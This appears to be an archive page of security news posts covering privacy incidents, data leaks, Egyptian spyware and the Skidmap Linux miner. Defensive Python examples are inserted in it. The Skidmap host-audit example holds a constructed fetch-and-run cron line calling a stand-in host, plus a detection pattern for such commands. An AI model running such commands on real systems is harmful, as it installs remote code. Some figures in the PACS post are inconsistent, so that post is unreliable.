Category Archives: digital id

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple: most of its users are likely unaware that the company is sharing iOS web browsing data on some of them with the Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying: starting from at least iOS 12.2, Apple has integrated “Tencent Safe Browsing” to improve the security of its users and protect them from fraudulent websites. Tencent Safe Browsing does this through the “Fraudulent Website Warning” feature of the Safari web browser, on both iOS and macOS, which checks every site the user visits.

Apple secure browsing

The service leverages a blacklist of malicious websites that is continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to know which websites they visit, and they also log their IP addresses to manage the browsing history. At this time, it’s not clear whether Tencent is also collecting IP addresses from users residing outside of China; most likely Tencent’s blacklist is only provided to Chinese users, because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google, and intelligence experts believe that it could share that information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that major changes of this kind have to be notified to users.

The good news is that users can turn off the Fraudulent Website Warning feature in Safari, even if doing so potentially exposes them to online threats.

The feature is enabled by default on iPhones and iPads running iOS 13; below are the instructions to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

Twitter inadvertently used Phone Numbers collected for security for Ads

Twitter admitted having “inadvertently” used phone numbers and email addresses, collected for security purposes, for advertising.

Twitter apologized for having used phone numbers and email addresses, provided by users for security purposes, for advertising. According to the social media company, data used for account authentication were also matched against advertisers’ databases to improve the efficiency of ads.

“We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system.” reads a post published by Twitter.

At the time of writing, the number of impacted Twitter users is unclear.

The company attempted to downplay the severity of the privacy incident, highlighting that none of the user data was shared with partners outside the company.

The Twitter Tailored Audiences product allows advertisers to target ads at customers based on the advertiser’s own marketing lists, which include info such as email addresses or phone numbers. Partner Audiences allows advertisers to use the same Tailored Audiences features to target ads at audiences provided by third-party partners.

Twitter admitted that when an advertiser uploaded a marketing list, its staff may have matched the information included in that list with data its users had provided to protect their accounts.

The root cause of the problem was addressed on September 17, 2019.

“We cannot say with certainty how many people were impacted by this, but in an effort to be transparent, we wanted to make everyone aware. No personal data was ever shared externally with our partners or any other third parties.” added Twitter.

“We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again.”

Pierluigi Paganini

(SecurityAffairs – Twitter, privacy)


Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt’s government has been spying on citizens in a sophisticated surveillance program.

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The experts started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point identified dozens of victims who were tricked into downloading the malicious apps, which offered useful services.

Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve security; iLoud200%, a smart storage solution that would free up storage space on the victim’s device; and the IndexY caller ID service.

Using these apps, the government cyber spies were able to gather login credentials for email accounts, bypass privacy settings, and collect call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

The experts provided details of the command and control infrastructure over time. The attackers used a range of domain names that included words like “secure” and “verify” to avoid raising the victims’ suspicion.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the experts to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims.”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence, such as a server registered to the Ministry of Communications and Information Technology in Egypt, all point in that direction.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)


Heyyo dating app left its users’ data exposed online

Another day, another embarrassing data leak makes the headlines: the online dating app Heyyo left a server exposed on the internet.

The online dating app Heyyo left a server exposed on the internet without protection; the data were stored on an Elasticsearch instance.

The exposed data included personal details, images, location data, phone numbers, and dating preferences for nearly 72,000 users.

The data left exposed online included:

  • Names
  • Phone numbers
  • Email addresses
  • Dates of birth
  • Gender
  • Height
  • Profile pictures and other images
  • Facebook IDs for users who linked their profiles
  • Instagram IDs for users who linked their profiles
  • Longitude and latitude
  • Who liked a user’s profile
  • Liked profiles
  • Disliked profiles
  • Superliked profiles
  • Blocked profiles
  • Dating preferences
  • Registration and last active date
  • Smartphone details

The news was first reported by ZDNet, which was informed about the incident by security researchers from WizCase.

“Avishai Efrat, Wizcase leading hacktivist, discovered a severe data leak on Heyyo, a relatively new mobile dating app. Our team was able to access a database of over 70,000 users from around the world through an unsecured Elasticsearch engine.” reported WizCase. “The majority of affected users are based in Turkey, but there’s also a significant number from the US and Brazil, which is over ⅕ of their user base.”

ZDNet verified the authenticity of the data and contacted the Turkey-based company behind Heyyo to notify it of the leak, but the company did not reply for a week.

While waiting for a reply from the development team, the experts noticed that the number of registered users grew from 71,769 to 71,921. The experts also registered an account and verified that the associated data were leaked online. This circumstance suggests that the server was a live production system.

The server was taken down today after ZDNet contacted Turkey’s Computer Emergency Response Team (CERT).

Clearly, the exposure of this type of data poses serious risks to users’ privacy, including extortion.

At the time of writing, it is unclear whether anyone else had access to the exposed database.

Unfortunately, other dating platforms suffered similar incidents in the past, including Ashley Madison, Grindr, 3Fun, and Luscious.

WizCase also has its own report on the leak, for additional reading.

Pierluigi Paganini

(SecurityAffairs – Heyyo, hacking)


Facebook suspends tens of thousands of apps from hundreds of developers

Facebook announced it has suspended tens of thousands of apps as a result of a review of privacy practices launched following the Cambridge Analytica scandal.

In April 2018, Facebook revealed that 87 million users had been affected by the Cambridge Analytica case, many more than the 50 million initially thought. The company allowed access to the personal data of around 87 million Facebook users without their explicit consent.

After the Cambridge Analytica privacy scandal in 2018, the social network giant launched a review of privacy practices. Facebook’s review of all apps on the platform aimed at identifying abuse of user data and violations of its privacy rules.

Now Facebook has announced the suspension of tens of thousands of apps.

According to vice president of partnerships Ime Archibong, the suspensions are “not necessarily an indication that these apps were posing a threat to people.” Archibong also added that some “did not respond to our request for information.”

Archibong revealed that the review “has addressed millions of apps. Of those, tens of thousands have been suspended for a variety of reasons while we continue to investigate.” In some cases Facebook completely banned the apps.

In July, the United States Federal Trade Commission (FTC) approved a record $5 billion settlement with Facebook over the Cambridge Analytica scandal.

Archibong explained that development teams behind the apps have to annually certify compliance with Facebook policies.

“Any developer that doesn’t go along with these requirements will be held accountable.” concluded Archibong.

Pierluigi Paganini

(SecurityAffairs – social network, privacy)


More than 737 million medical radiological images found on open PACS servers

Researchers at Greenbone Networks, a vulnerability analysis and management company, discovered 400 million medical radiological images exposed online via unsecured PACS servers.

The experts at Greenbone Networks discovered 600 unprotected servers exposed online that contained medical radiological images. The research was conducted between mid-July 2019 and early September 2019.

The unprotected medical image storage systems were located in 52 countries; the experts found that they were affected by 10,000 vulnerabilities, more than 500 of them rated with the highest severity score (CVSS 10 out of 10).

Greenbone Networks researchers analyzed about 2,300 Picture Archiving and Communication System (PACS) systems exposed online.

PACS servers are used in the healthcare industry to archive images created by radiological processes and to make them available to medical staff for analysis and diagnosis. These systems use the DICOM (Digital Imaging and Communications in Medicine) standard to manage medical imaging data.

The experts discovered 590 PACS servers that allowed them to retrieve about 24.3 million patient records.

“Of the 2,300 archive systems worldwide that were analyzed, 590 of them have been identified as accessible on the internet; together they contain over 24 million data records from patients from across 52 countries.” reads the report published by Greenbone. “There are more than 737 million images linked to this patient data, around 400 million of which are accessible or can be easily downloaded from the internet. In addition, there are 39 systems that allow access to patient data via an unencrypted HTTP Web Viewer, without any protection.”

Most of the exposed records included the following personal and medical details:

  • First name and surname
  • Date of birth
  • Date of examination
  • Scope of the investigation
  • Type of imaging procedure
  • Attending physician
  • Institute/clinic
  • Number of generated images

The researchers used the RadiAnt DICOM Viewer to analyze data from the open PACS servers exposed online; they were able to download and view 399.5 million images out of 733.5 million.
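The record fields listed above live inside each DICOM file as tagged data elements, so a defender triaging an exposed archive needs to read those tags, and a file must have them blanked before it is shared. The following inspector is an added example written for this page, not Greenbone's or RadiAnt's code; it assumes the Part-10 layout with the explicit VR little endian transfer syntax and no nested sequences, and the sample file it parses is constructed inline.

```python
"""Minimal DICOM (explicit VR little endian) inspector that reports which patient
identifiers a file carries and blanks them in place. Added example for this page,
not Greenbone's or RadiAnt's code; the sample file is constructed (assumptions:
Part-10 layout, explicit VR LE, no nested sequences)."""
import struct

# VRs whose length field is 4 bytes after a 2-byte reserved gap (DICOM PS3.5)
LONG_VRS = {"OB", "OW", "OF", "SQ", "UT", "UN"}

# Tags carrying the record details listed in the report: (group, element) -> name
RECORD_TAGS = {
    (0x0010, 0x0010): "PatientName",
    (0x0010, 0x0030): "PatientBirthDate",
    (0x0008, 0x0020): "StudyDate",
    (0x0008, 0x0060): "Modality",            # type of imaging procedure
    (0x0008, 0x0080): "InstitutionName",
    (0x0008, 0x0090): "ReferringPhysicianName",
}
# Subset that identifies a person and must be removed before an image is shared
IDENTIFYING = {"PatientName", "PatientBirthDate", "ReferringPhysicianName", "InstitutionName"}


def encode_element(group, element, vr, value):
    """Encode one data element, padding to even length as the standard requires."""
    if isinstance(value, str):
        value = value.encode("ascii")
    if len(value) % 2:
        value += b"\x00" if vr in ("OB", "UI") else b" "
    head = struct.pack("<HH", group, element) + vr.encode("ascii")
    if vr in LONG_VRS:
        return head + b"\x00\x00" + struct.pack("<I", len(value)) + value
    return head + struct.pack("<H", len(value)) + value


def build_sample_file():
    """Constructed Part-10 file: 128-byte preamble, 'DICM', meta group, dataset."""
    body = b"".join([
        encode_element(0x0002, 0x0010, "UI", "1.2.840.10008.1.2.1"),  # explicit VR LE
        encode_element(0x0008, 0x0020, "DA", "20190715"),
        encode_element(0x0008, 0x0060, "CS", "CT"),
        encode_element(0x0008, 0x0080, "LO", "Sample Clinic"),
        encode_element(0x0008, 0x0090, "PN", "SMITH^JOHN"),
        encode_element(0x0010, 0x0010, "PN", "DOE^JANE"),
        encode_element(0x0010, 0x0030, "DA", "19700101"),
        encode_element(0x7FE0, 0x0010, "OB", b"\x00\x01\x02\x03"),  # fake pixel data
    ])
    return b"\x00" * 128 + b"DICM" + body


def parse_dataset(data):
    """Walk the elements: {(group, element): (vr, value_offset, length)}."""
    pos = 132 if data[128:132] == b"DICM" else 0  # tolerate headerless datasets
    elements = {}
    while pos + 8 <= len(data):
        group, element = struct.unpack_from("<HH", data, pos)
        vr = data[pos + 4:pos + 6].decode("ascii")
        if vr in LONG_VRS:
            length = struct.unpack_from("<I", data, pos + 8)[0]
            pos += 12
        else:
            length = struct.unpack_from("<H", data, pos + 6)[0]
            pos += 8
        if length == 0xFFFFFFFF:  # undefined length (sequences): out of scope here
            raise ValueError("undefined-length element at offset %d" % (pos - 12))
        elements[(group, element)] = (vr, pos, length)
        pos += length
    return elements


def phi_report(data):
    """Return the record fields present, decoded and stripped of padding."""
    found = {}
    for tag, (vr, off, length) in parse_dataset(data).items():
        if tag in RECORD_TAGS:
            found[RECORD_TAGS[tag]] = data[off:off + length].decode("ascii").strip(" \x00")
    return found


def redact_identifiers(data):
    """Overwrite identifying text with spaces of equal length so offsets stay valid."""
    out = bytearray(data)
    for tag, (vr, off, length) in parse_dataset(data).items():
        if RECORD_TAGS.get(tag) in IDENTIFYING:
            out[off:off + length] = b" " * length
    return bytes(out)
```

Running `phi_report(build_sample_file())` lists the patient, physician and clinic fields; after `redact_identifiers` the same call shows them empty while the study date and modality, which the report counts among the stored details but which do not name a person, are preserved.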

Looking at the geographic distribution of the PACS servers that were leaking images, most of the unprotected PACS servers in North America are in the U.S.

“In the US, the number is orders of magnitude higher with 13.7 million data sets and 45.8 million images freely accessible on the internet.” continues the report.

The experts found that Italy has the highest number of affected systems (10) in Europe and is also the country with the largest amount of leaked medical information.

PACS servers

In South America, most of the exposed images were stored on PACS servers in Brazil (34); in that country the experts found 640,000 data sets and 31.1 million images.

Most of the open servers in Asia are in India (100), while the largest number of data records (4.9 million) is in Turkey.

Apart from these problems, the audit found that 45 PACS servers provided data over an insecure protocol such as HTTP or FTP instead of DICOM; thus, the data stored on them could be accessed without authentication.

One of these had the files of the DICOM archive available in a directory listing, allowing access to anyone via a web browser.

Researchers estimated that the value of leaked data on the Darknet would probably be in excess of one billion US dollars.

“This data could be exploited by attackers for various purposes. These include publishing individual names and images to the detriment of a person’s reputation; connecting the data with other Darknet sources to make phishing social engineering even more effective; reading and automatically processing the data to search for valuable identity information, such as Social Security Numbers, in preparation for identity theft.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – PACS servers, data leak)


Skidmap Linux miner leverages kernel-mode rootkits to evade detection

Trend Micro researchers spotted a Linux cryptocurrency miner, dubbed Skidmap, that leverages kernel-mode rootkits to evade detection.

Skidmap is a new crypto-miner detected by Trend Micro that targets Linux machines; it uses kernel-mode rootkits to evade detection.

This malware stands out from similar miners because of the way it loads malicious kernel modules to evade detection.

The crypto-miner sets up a secret master password that it uses to access any user account on the system.

“These kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system.” states the analysis published by TrendMicro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”

The experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same one that provided the attackers with root or administrative access to the system.

The infection chain sees the Skidmap miner installing itself via crontab; the malicious code then downloads and executes the main binary. The malware lowers the security settings of the target system by setting the Security-Enhanced Linux (SELinux) module to permissive mode, or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also sets up backdoor access to the infected system.

Skidmap also provides attackers with backdoor access to the infected machine.

“Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine. The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version.”

The main binary checks whether the system runs Debian or RHEL/CentOS, then drops the miner and the other components for that specific Linux distro.

Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they keep running. Examples of these components are:

A fake “” binary that replaces the original; once executed, it randomly sets up a malicious cron job to download and execute a file.

Another component is “kaudited,” a file installed as /usr/bin/kaudited that drops and installs several loadable kernel modules (LKMs). The kaudited binary also drops a watchdog component used to monitor the mining process.

Trend Micro also described the “iproute” module, which hooks the getdents system call, normally used to read the contents of a directory, in order to hide specific files.

The last component is “netlink,” a rootkit that fakes network traffic statistics and CPU-related statistics to hide the malware’s activity.

“Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware.” Trend Micro concludes. “In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up.”
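The persistence and hardening-rollback tricks described above (the cron installer, SELinux set to permissive, the added authorized_keys entry, the replaced pam_unix.so and the /usr/bin/kaudited dropper) each leave a host artefact a responder can check for. The script below is an added example, not Trend Micro's code: it audits a filesystem root against a known-good baseline, and for the demonstration builds a constructed fake root in a temporary directory; the pam_unix.so path, the baseline hash and the sample cron and key lines are assumptions.

```python
"""Host checks for the persistence and hardening-rollback tricks the report
attributes to Skidmap. Added example, not Trend Micro's code. It runs here against
a constructed fake root in a temp directory; file paths, the baseline hash and the
sample cron/key lines are assumptions (adjust paths and baseline for real hosts)."""
import hashlib
import os
import re
import tempfile

KAUDITED = "usr/bin/kaudited"                             # dropper path quoted in the report
PAM_UNIX = "lib/x86_64-linux-gnu/security/pam_unix.so"   # assumed Debian location
SELINUX_CONF = "etc/selinux/config"
CRON_FILES = ("etc/crontab", "var/spool/cron/crontabs/root")
AUTH_KEYS = "root/.ssh/authorized_keys"
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")  # fetch-and-run cron jobs


def _lines(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return [line.rstrip("\n") for line in f]


def _sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def audit(root, baseline):
    """Return [(indicator, detail)] for a filesystem rooted at `root`.
    baseline = {"pam_unix_sha256": hex, "authorized_keys": set of known key lines}.
    Caveat: an LKM rootkit hooking getdents can hide files from a live host, so
    for a suspect machine run this over an offline-mounted copy of the disk."""
    p = lambda rel: os.path.join(root, rel)
    findings = []
    if os.path.exists(p(KAUDITED)):
        findings.append(("kaudited_present", KAUDITED))
    if os.path.exists(p(PAM_UNIX)) and _sha256(p(PAM_UNIX)) != baseline["pam_unix_sha256"]:
        findings.append(("pam_unix_modified", PAM_UNIX))      # replaced auth module
    if os.path.exists(p(SELINUX_CONF)):
        for line in _lines(p(SELINUX_CONF)):
            m = re.match(r"\s*SELINUX\s*=\s*(\w+)", line)
            if m and m.group(1).lower() in ("permissive", "disabled"):
                findings.append(("selinux_weakened", m.group(1)))
    for rel in CRON_FILES:
        if os.path.exists(p(rel)):
            for line in _lines(p(rel)):
                if DOWNLOAD_EXEC.search(line):
                    findings.append(("cron_download_exec", line.strip()))
    if os.path.exists(p(AUTH_KEYS)):
        for line in _lines(p(AUTH_KEYS)):
            line = line.strip()
            if line and not line.startswith("#") and line not in baseline["authorized_keys"]:
                findings.append(("unknown_authorized_key", line.split()[0] + " ..."))
    return findings


ADMIN_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIADMINKEYPLACEHOLDER admin@host"  # constructed
CLEAN_BASELINE = {
    "pam_unix_sha256": hashlib.sha256(b"\x7fELF genuine pam_unix (constructed)").hexdigest(),
    "authorized_keys": {ADMIN_KEY},
}


def build_fake_root(infected):
    """Create a throwaway directory tree mimicking a clean or a Skidmap-like host."""
    root = tempfile.mkdtemp(prefix="skidmap-demo-")

    def write(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb" if isinstance(content, bytes) else "w") as f:
            f.write(content)

    write(AUTH_KEYS, ADMIN_KEY + "\n")
    if not infected:
        write(PAM_UNIX, b"\x7fELF genuine pam_unix (constructed)")
        write(SELINUX_CONF, "SELINUX=enforcing\nSELINUXTYPE=targeted\n")
        write(CRON_FILES[0], "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
        return root
    write(KAUDITED, b"\x7fELF fake dropper (constructed)")
    write(PAM_UNIX, b"\x7fELF tampered pam_unix (constructed)")
    write(SELINUX_CONF, "SELINUX=permissive\nSELINUXTYPE=targeted\n")
    write(CRON_FILES[0], "*/1 * * * * root curl -fsSL http://c2.invalid/pm.sh | sh\n")
    write(AUTH_KEYS, ADMIN_KEY + "\nssh-rsa AAAAB3NzaC1yc2EUNKNOWNKEYPLACEHOLDER\n")
    return root


def demo():
    """Indicator names found on the infected fake root (empty set on the clean one)."""
    return {name for name, _ in audit(build_fake_root(infected=True), CLEAN_BASELINE)}
```

The baseline hash should come from the distro package (for example the package manager's file verification) rather than from the suspect host itself, since the report notes Skidmap replaces pam_unix.so outright.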

Pierluigi Paganini

(SecurityAffairs – Skidmap miner, Linux)


Experts warn of the exposure of thousands of Google Calendars online

The news is shocking: thousands of Google Calendars are leaking private information, posing a severe threat to users’ privacy.

Thousands of Google Calendars are leaking private information online threatening the privacy of the users.

Google Calendar has more than a billion users who could potentially expose their private affairs due to an issue in the “invite” feature. It is essential to point out that this isn’t a security vulnerability in Google Calendar, but an issue that could potentially impact anyone who has ever shared their Google Calendar.

You should immediately go back to your Google settings and check whether you’re exposing all your events and business activities on the Internet, accessible to anyone.

The security researcher Avinash Jain discovered more than 8000 Google Calendars exposed online that were indexed by Google’s search engine. This means that anyone could potentially access sensitive data and add new events that could be used to share bogus information or malicious links.

Avinash Jain contacted several media outlets, including Forbes and THN; the Indian expert works for the e-commerce firm Grofers.

“What I found is that — Using a single Google dork (advance search query), I am able to list down all the public google calendar or users who all have set their calendar as public. I found dozens of calendars which are indexed by google’s search engines, revealing or disclosing several sensitive information.” wrote the expert. “I was able to access public calendars of various organizations leaking out sensitive details like their email ids, their event name, event details, location, meeting links, zoom meeting links, google hangout links, internal presentation links and much more,”

Google Calendars

Some of the calendars belonged to employees of Alexa top 500 companies and had been made public, intentionally or unintentionally.

The issue is related to the public visibility that users set on their Google Calendar. Google fails to send any notification to users warning them about the visibility of their calendar.

“While this is more of an intended setting by the users and intended behavior of the service but the main issue here is that anyone can view anyone public calendar, add anything on it—just by a single search query without being shared the calendar link,” Avinash added.

The issue is not new: in recent years many experts have warned of the misuse of the “make it public” feature of the web-based calendar service, which was introduced 12 years ago.

The expert demonstrated that it is possible to view the exposed Google Calendars by using an advanced Google search query (Google dork).

“The fix for this: https://support.google.com/a/answer/60765?hl=en. You can set the calendars to only say Free/Busy if anyone wants to make their calendar public. GSuite admin can also create alerts for when Google docs, presentations, and calendars go public.” concludes the researcher.
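The exposure described above comes down to one sharing rule: a calendar whose access list grants event details to "anyone" rather than only Free/Busy. The following audit is an added example, not Google's code or the researcher's; it assumes sharing rules in the shape of Calendar API aclRule resources (a `scope.type` of `"default"` meaning public, and roles such as `reader` or `freeBusyReader`), and the calendar listing it checks is constructed.

```python
"""Audit of calendar sharing rules that finds calendars exposing full event
details to anyone, plus the Free/Busy downgrade the researcher recommends.
Added example, not Google's code: rules follow the shape of Calendar API
aclRule resources ({"scope": {"type": ...}, "role": ...}); listing is constructed."""

PUBLIC_SCOPE = "default"                      # scope.type "default" = anyone, i.e. public
DETAIL_ROLES = {"reader", "writer", "owner"}  # roles that reveal event details


def _public_roles(rules):
    """Roles granted to the public scope, ignoring explicit 'none' entries."""
    return {r.get("role") for r in rules
            if r.get("scope", {}).get("type") == PUBLIC_SCOPE} - {"none", None}


def classify(rules):
    """'public-details' (the leak described above), 'public-free-busy' or 'not-public'."""
    roles = _public_roles(rules)
    if roles & DETAIL_ROLES:
        return "public-details"
    if "freeBusyReader" in roles:
        return "public-free-busy"
    return "not-public"


def audit(listing):
    """listing: {calendar_id: [rule, ...]} -> sorted ids whose events are world-readable."""
    return sorted(cid for cid, rules in listing.items() if classify(rules) == "public-details")


def downgrade_to_free_busy(rules):
    """Copy of `rules` with every public detail-revealing rule reduced to freeBusyReader,
    i.e. the 'only say Free/Busy' setting from the researcher's fix; other rules untouched."""
    return [dict(r, role="freeBusyReader")
            if r.get("scope", {}).get("type") == PUBLIC_SCOPE and r.get("role") in DETAIL_ROLES
            else r
            for r in rules]


def remediated_listing(listing):
    """Apply the downgrade to every flagged calendar; returns the fixed listing."""
    flagged = set(audit(listing))
    return {cid: downgrade_to_free_busy(rules) if cid in flagged else rules
            for cid, rules in listing.items()}


def _owner(who):
    return {"scope": {"type": "user", "value": who}, "role": "owner"}


SAMPLE_LISTING = {  # constructed: one leaking, one Free/Busy only, one domain-internal
    "ops-team@example.com": [_owner("ops-team@example.com"),
                             {"scope": {"type": "default"}, "role": "reader"}],
    "room-bookings@example.com": [_owner("room-bookings@example.com"),
                                  {"scope": {"type": "default"}, "role": "freeBusyReader"}],
    "alice@example.com": [_owner("alice@example.com"),
                          {"scope": {"type": "domain", "value": "example.com"}, "role": "reader"}],
}
```

A G Suite admin can pull the real rules per calendar and feed them to `audit`; the domain-scoped calendar is reported as not public because it is invisible to search engines, even though it is still readable by everyone in the organisation.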

Pierluigi Paganini

(SecurityAffairs – Google Calendars, privacy)


France and Germany will block Facebook’s Libra cryptocurrency

Bad news for Facebook and its projects, France and Germany agreed to block Facebook’s Libra cryptocurrency, the French finance ministry said.

The French and German governments announced that they will block Facebook’s Libra cryptocurrency; the news was reported by French Finance Minister Bruno Le Maire.

“We believe that no private entity can claim monetary power, which is inherent to the sovereignty of nations,” reads a joint statement issued by the two governments.

“I want to be absolutely clear: in these conditions, we cannot authorise the development of Libra on European soil,” Le Maire said at a conference in Paris on virtual currencies.

French Finance Minister Bruno Le Maire explained last week that Facebook should not be allowed to operate the Libra cryptocurrency in Europe because it threatens the monetary sovereignty and financial systems of the states.

Facebook Libra cryptocurrency
Source: Coindesk.com

Facebook announced in June that it plans to launch Libra in 2020; to make it reliable, the social network giant wants to back Libra with traditional currency.

The non-profit Libra Association includes major firms such as PayPal, Visa, Stripe, Mastercard, eBay, and Uber.

“Unlike other cryptocurrencies, which are not controlled by a central authority, Libra will not be decentralised, but will be entrusted to a Swiss-based association of major technology and financial services companies. Besides Facebook, backers of Libra include the payment companies Visa, MasterCard and PayPal, and the ride-hailing apps Lyft and Uber.” reported The Guardian.

Authorities also fear possible abuses of the Libra cryptocurrency, including money laundering, and how Facebook would prevent them.

Pierluigi Paganini

(SecurityAffairs – Facebook, cryptocurrency)


Tor Project’s Bug Smash Fund raises $86K in August

The Tor Project has raised $86,000 for a Bug Smash fund that it will use to pay developers that will address critical flaws in the popular anonymizing network.

The Tor Project has raised $86,000 for a Bug Smash fund that was created to pay developers that will address critical security and privacy issues in the popular anonymizing network.

In early August, the Tor Project announced the creation of the Bug Smash Fund with the intent of paying professionals who will support the organization in maintenance work and bug smashing.

“The goal of the Bug Smash Fund is to increase the Tor Project’s reserve of funds that allow us to complete maintenance work and smash the bugs necessary to keep Tor Browser, the Tor network, and the many tools that rely on Tor strong, safe, and running smoothly.” reads the announcement published by the Tor Project.

“When we say maintenance and bugs, we are talking about work that is critical—and that we must pay for. This work includes responding quickly to security bugs, improving test coverage, and keeping up with Mozilla’s ESRs. An entire ecosystem relies on us doing so.”

The organization has added donations it received in August 2019 to the Bug Smash Fund.

Any vulnerability that could be used to de-anonymize Tor users, or that attackers could use to disrupt the anonymizing network, is considered critical and must be addressed rapidly; part of the Bug Smash Fund will allow paying developers to do so.

The fund aims to be transparent: any donor can track how the money is being used, because the Tor Project will tag every bug ticket that draws on the fund with the “BugSmashFund” tag.

“Want to keep up with the work we’re doing with this fund? There are three ways: (1) Follow the “BugSmashFund” trac ticket tag, (2) watch this blog for updates about the progress of these tickets, and (3) make a donation and opt in for our newsletter to get updates directly to your inbox.” concludes the announcement.

“Want to contribute anonymously, with cryptocurrency, or by mail? Here’s how.”

Pierluigi Paganini

(SecurityAffairs – Tor Project, privacy)
